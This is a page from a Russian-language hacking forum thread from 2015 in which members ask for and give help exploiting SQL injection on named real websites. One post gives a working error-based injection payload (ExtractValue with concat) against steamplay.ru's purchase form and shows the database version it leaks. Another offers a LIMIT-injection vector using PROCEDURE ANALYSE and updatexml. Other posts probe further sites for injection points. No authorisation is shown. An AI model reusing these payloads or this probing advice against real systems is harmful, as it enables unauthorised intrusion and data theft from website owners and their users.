HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 62 из 296 « Первая < 1252 58 59 60 61 62 63 64 65 66 72112162 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #611  
Старый 30.09.2015, 18:41
cheebeez
Новичок
Регистрация: 28.02.2010
Сообщений: 5
Провел на форуме:
20360

Репутация: 0
По умолчанию
[DEL 32]
 
Ответить с цитированием

  #612  
Старый 30.09.2015, 20:24
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию
Цитата:
Сообщение от SaNDER  
SaNDER said:

_ttp://steamplay.ru/confirm_buying

в /confirm_buying находится скуль инжект(правда,сканер не врёт) .

Через Post посылаю id_goods=1'",выводит обратно на главную страницу .

Тогда как сканер туда попал ? . И как мне туда попасть? .
куки куки, сессию подключения вероятно нужно передавать

Цитата:
Сообщение от None  
Через Post посылаю id_goods=1




юзай curl, в firefox(firebug) к тому же можно скопировать запрос в формате curl
 
Ответить с цитированием

  #613  
Старый 30.09.2015, 23:43
ButilkaSoka
Guest
Сообщений: n/a
Провел на форуме:
7285

Репутация: 0
По умолчанию
Цитата:
Сообщение от SaNDER  
SaNDER said:

POST /confirm_buying HTTP/1.1 Content-Length: 353 Content-Type: application/x-www-form-urlencoded Referer:
http://steamplay.ru:80/
А вот то что сканер видит :
Код:
Code:
A Database Error Occurred
Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"'' at line 1

UPDATE `items` SET `views` = `views` + 1 WHERE `digiseller_id` = '1'"'

Filename: /home/s/steampxb/steampxb.bget.ru/public_html/helpers/top10_helper.php
Line Number: 30
Но вот,что странно
Response показывает это :
Код:
Code:
HTTP/1.1 500 Internal Server Error Server: nginx/1.9.4 Date: Wed, 30 Sep 2015 08:24:41 GMT Content-Type: text/html Content-Length: 1500 Connection: keep-alive Keep-Alive: timeout=30 X-Powered-By: PHP/5.4.44
.
В Acunetix есть HTTP Editor, там будет id_goods=1, через XPATH

Код:
Code:
csrf_ytse_token=01cc4a2e39c048f58f725bfe26e5d57c&failpage=http://steamplay.ru
/&goods_title=BRILLIANT%20STEAM%20%d0%ba%d0%bb%d1%8e%d1%87%20%2b%5b
%20CS%20GO%20Arma%20DAYZ%20GTA%20%5d%2b%20%d0%9f%d0%9e%d0%94%d0%90
%d0%a0%d0%9a%d0%98&id_agent=390191&id_goods=1'or(ExtractValue(0x3a,concat(0x3a,(select version()))))='&price=15&thumbnail=1910800.jpg&token=27091&type_curr=WMR
XPATH syntax error: ':5.6.26-74.0-beget-log'
 
Ответить с цитированием

  #614  
Старый 01.10.2015, 00:39
cheebeez
Новичок
Регистрация: 28.02.2010
Сообщений: 5
Провел на форуме:
20360

Репутация: 0
По умолчанию
[DEL 33]
 
Ответить с цитированием

  #615  
Старый 01.10.2015, 01:51
RedFern.89
Постоянный
Регистрация: 20.01.2010
Сообщений: 338
Провел на форуме:
500264

Репутация: 69
Отправить сообщение для RedFern.89 с помощью ICQ
По умолчанию
Возможно ли раскрутить?

Код:
Code:
http://prodota.ru/news/?p=\
 
Ответить с цитированием

  #616  
Старый 01.10.2015, 03:40
ghost8
Guest
Сообщений: n/a
Провел на форуме:
37430

Репутация: 0
По умолчанию
возможно,каков вопрос-такой ответ

Дельный совет чуваки,сначало пробуйте методом проб и ошибок,потом задавайте вопрос,это для вас же будет лучше,больше поймте
 
Ответить с цитированием

  #617  
Старый 01.10.2015, 03:47
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию
Цитата:
Сообщение от RedFern.89  
RedFern.89 said:

Код:
Code:
***
Возможно ли раскрутить?
Вероятно инъекция в LIMIT. Попробуйте применить соответствующий вектор:

Код:
Code:
PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), 1)))
https://rdot.org/forum/showthread.php?t=60&page=3

Цитата:
Сообщение от RedFern.89  
RedFern.89 said:

Возможно ли раскрутить?
Код:
Code:
http://prodota.ru/news/?p=\
Функционал, преобразующий номер страницы в числа LIMIT-ов, никогда не был и не будет уязвим к атакам типа SQLi. Если вы видете в ответе что-то вроде этого:

Код:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20'
Смело считайте, что там ничего нет. Эти инъекции стабильно появляются у нас в теме раз в неделю.
 
Ответить с цитированием

  #618  
Старый 01.10.2015, 13:48
cheebeez
Новичок
Регистрация: 28.02.2010
Сообщений: 5
Провел на форуме:
20360

Репутация: 0
По умолчанию
[DEL 35]
 
Ответить с цитированием

  #619  
Старый 01.10.2015, 17:47
Sice54
Guest
Сообщений: n/a
Провел на форуме:
291

Репутация: 0
По умолчанию
Доброго времени суток друзья, пытаюсь найти что-то интересно и вывести ошибки на сайте.

Подставляю кавычку в параметр page, он отображает эту ковычку с обратным слешем.

ventilyatory-c-904_26.html?page=2'&filter_id=287

На определенных страницах, пишет "Интернет-магазин закрыт на техническое обслуживание, заходите позже!"

ventilyatory-c-904_26.html?ppp=50'

Подскажите пожалуйста, можно как-нибудь вывести ошибку в итоге ? И что это за случай ?

Заранее спасибо.
 
Ответить с цитированием

  #620  
Старый 01.10.2015, 20:11
cheebeez
Новичок
Регистрация: 28.02.2010
Сообщений: 5
Провел на форуме:
20360

Репутация: 0
По умолчанию
[DEL 38]
 
Ответить с цитированием
Ответ
Страница 62 из 296 « Первая < 1252 58 59 60 61 62 63 64 65 66 72112162 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ